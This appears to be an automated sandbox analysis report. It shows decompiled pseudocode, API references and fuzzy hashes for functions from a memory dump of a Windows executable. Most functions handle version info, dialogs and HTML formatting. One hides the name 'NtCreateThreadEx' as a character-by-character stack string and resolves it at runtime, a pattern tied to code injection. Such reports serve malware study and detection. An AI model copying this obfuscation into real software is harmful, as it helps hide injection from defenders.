                                                                                                                0x00408d2e
                                                                                                                0x00408d35
                                                                                                                0x00408d36
                                                                                                                0x00408d42
                                                                                                                0x00408d48
                                                                                                                0x00408d4e
                                                                                                                0x00408d54
                                                                                                                0x00408d5a
                                                                                                                0x00408d60
                                                                                                                0x00408d66
                                                                                                                0x00408d6c
                                                                                                                0x00408d72
                                                                                                                0x00408d73
                                                                                                                0x00408d7f
                                                                                                                0x00408d85
                                                                                                                0x00408d8a
                                                                                                                0x00408d8f
                                                                                                                0x00408d90
                                                                                                                0x00408da8
                                                                                                                0x00408db9
                                                                                                                0x00408dbf
                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                0x0040b04d
                                                                                                                0x0040b05e
                                                                                                                0x0040b060
                                                                                                                0x0040b063
                                                                                                                0x0040b06a
                                                                                                                0x0040b06d
                                                                                                                0x0040b076
                                                                                                                0x0040b07b
                                                                                                                0x0040b07e
                                                                                                                0x0040b084
                                                                                                                0x0040b08e
                                                                                                                0x0040b0a8
                                                                                                                0x0040b0aa
                                                                                                                0x0040b0ad
                                                                                                                0x0040b0b0
                                                                                                                0x0040b0b3
                                                                                                                0x0040b0b6
                                                                                                                0x0040b0b8
                                                                                                                0x0040b0bb
                                                                                                                0x0040b0be
                                                                                                                0x0040b0c1
                                                                                                                0x0040b0c4
                                                                                                                0x0040b0c7
                                                                                                                0x0040b0ca
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0e5
                                                                                                                0x0040b11f
                                                                                                                0x0040b128
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0f1
                                                                                                                0x0040b0f2
                                                                                                                0x0040b0f3
                                                                                                                0x0040b0fb
                                                                                                                0x0040b0fd
                                                                                                                0x0040b0fe
                                                                                                                0x0040b11d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040b11d
                                                                                                                0x0040b13c
                                                                                                                0x0040b151
                                                                                                                0x0040b166
                                                                                                                0x0040b17b
                                                                                                                0x0040b190
                                                                                                                0x0040b1a5
                                                                                                                0x0040b1ba
                                                                                                                0x0040b1cf
                                                                                                                0x0040b1d6
                                                                                                                0x0040b1d7
                                                                                                                0x0040b1d8
                                                                                                                0x0040b1de
                                                                                                                0x0040b1e3

                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                0x0040a1f8
                                                                                                                0x0040a26d
                                                                                                                0x00000000
                                                                                                                0x0040a26f
                                                                                                                0x0040a205
                                                                                                                0x0040a20b
                                                                                                                0x0040a20d
                                                                                                                0x0040a213
                                                                                                                0x0040a214
                                                                                                                0x0040a215
                                                                                                                0x0040a216
                                                                                                                0x0040a217
                                                                                                                0x0040a219
                                                                                                                0x0040a21f
                                                                                                                0x0040a223
                                                                                                                0x0040a227
                                                                                                                0x0040a22b
                                                                                                                0x0040a22f
                                                                                                                0x0040a233
                                                                                                                0x0040a237
                                                                                                                0x0040a23b
                                                                                                                0x0040a23f
                                                                                                                0x0040a243
                                                                                                                0x0040a247
                                                                                                                0x0040a24b
                                                                                                                0x0040a24f
                                                                                                                0x0040a253
                                                                                                                0x0040a257
                                                                                                                0x0040a25b
                                                                                                                0x0040a25f
                                                                                                                0x0040a269
                                                                                                                0x00000000
                                                                                                                0x0040a26c
                                                                                                                0x0040a271

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                0x00407f9b
                                                                                                                0x00407fa3
                                                                                                                0x00407fad
                                                                                                                0x00407fb9
                                                                                                                0x0040802e
                                                                                                                0x00408032
                                                                                                                0x00408038
                                                                                                                0x0040803e
                                                                                                                0x00407fbb
                                                                                                                0x00407fc9
                                                                                                                0x00407fd0
                                                                                                                0x00407fe0
                                                                                                                0x00407fe5
                                                                                                                0x00407ff7
                                                                                                                0x00408015
                                                                                                                0x0040801b
                                                                                                                0x00408021
                                                                                                                0x00408021
                                                                                                                0x00408051
                                                                                                                0x00408051
                                                                                                                0x00408059
                                                                                                                0x00408065
                                                                                                                0x00408069
                                                                                                                0x0040806f
                                                                                                                0x00408087
                                                                                                                0x00408087
                                                                                                                0x0040809c
                                                                                                                0x004080bb
                                                                                                                0x004080d1
                                                                                                                0x004080de
                                                                                                                0x004080e2
                                                                                                                0x004080ea
                                                                                                                0x004080fb
                                                                                                                0x00408105
                                                                                                                0x00408115
                                                                                                                0x00408121
                                                                                                                0x00408127
                                                                                                                0x00408150

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                0x0040ae90
                                                                                                                0x0040aeab
                                                                                                                0x0040aeb2
                                                                                                                0x0040aec0
                                                                                                                0x0040aec7
                                                                                                                0x0040aecc
                                                                                                                0x0040aed3
                                                                                                                0x0040aeda
                                                                                                                0x0040aee1
                                                                                                                0x0040aee1
                                                                                                                0x0040aee7
                                                                                                                0x0040aeea
                                                                                                                0x0040aeed
                                                                                                                0x0040aef9
                                                                                                                0x0040aefe
                                                                                                                0x0040af05
                                                                                                                0x0040af07
                                                                                                                0x0040af08
                                                                                                                0x0040af13
                                                                                                                0x0040af18
                                                                                                                0x0040af19
                                                                                                                0x0040af26
                                                                                                                0x0040af2b
                                                                                                                0x0040af2b
                                                                                                                0x0040af2e
                                                                                                                0x0040af34
                                                                                                                0x0040af43
                                                                                                                0x0040af44
                                                                                                                0x0040af4f
                                                                                                                0x0040af54
                                                                                                                0x0040af55
                                                                                                                0x0040af62
                                                                                                                0x0040af67
                                                                                                                0x0040af70
                                                                                                                0x0040af76
                                                                                                                0x0040af7a
                                                                                                                0x0040af82
                                                                                                                0x0040af88
                                                                                                                0x0040af8d
                                                                                                                0x0040af97
                                                                                                                0x0040af9f
                                                                                                                0x0040afa5
                                                                                                                0x0040afa9
                                                                                                                0x0040afb1
                                                                                                                0x0040afb7
                                                                                                                0x0040afbd

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                0x00403c09
                                                                                                                0x00403c0c
                                                                                                                0x00403c11
                                                                                                                0x00403c1b
                                                                                                                0x00403c3f
                                                                                                                0x00403c4a
                                                                                                                0x00403c6e
                                                                                                                0x00403c96
                                                                                                                0x00403c9a
                                                                                                                0x00403ca6
                                                                                                                0x00403cb3
                                                                                                                0x00403cb8
                                                                                                                0x00403cc5
                                                                                                                0x00403cca
                                                                                                                0x00403cdd
                                                                                                                0x00403ce6
                                                                                                                0x00403cf8
                                                                                                                0x00403d11
                                                                                                                0x00403d26
                                                                                                                0x00403d3f
                                                                                                                0x00403d54
                                                                                                                0x00403d6d
                                                                                                                0x00403d76
                                                                                                                0x00403d88
                                                                                                                0x00403d9e
                                                                                                                0x00403db0
                                                                                                                0x00403db5
                                                                                                                0x00403dc4
                                                                                                                0x00403dc8
                                                                                                                0x00403dc9
                                                                                                                0x00403dca
                                                                                                                0x00403dda
                                                                                                                0x00403ddf
                                                                                                                0x00403de2
                                                                                                                0x00403de3
                                                                                                                0x00403df4
                                                                                                                0x00403df8
                                                                                                                0x00403df9
                                                                                                                0x00403dfa
                                                                                                                0x00403e0a
                                                                                                                0x00403e0f
                                                                                                                0x00403e12
                                                                                                                0x00403e13
                                                                                                                0x00403e22
                                                                                                                0x00403e26
                                                                                                                0x00403e28
                                                                                                                0x00403e29
                                                                                                                0x00403e39
                                                                                                                0x00403e3e
                                                                                                                0x00403e41
                                                                                                                0x00403e42
                                                                                                                0x00403e51
                                                                                                                0x00403e55
                                                                                                                0x00403e57
                                                                                                                0x00403e58
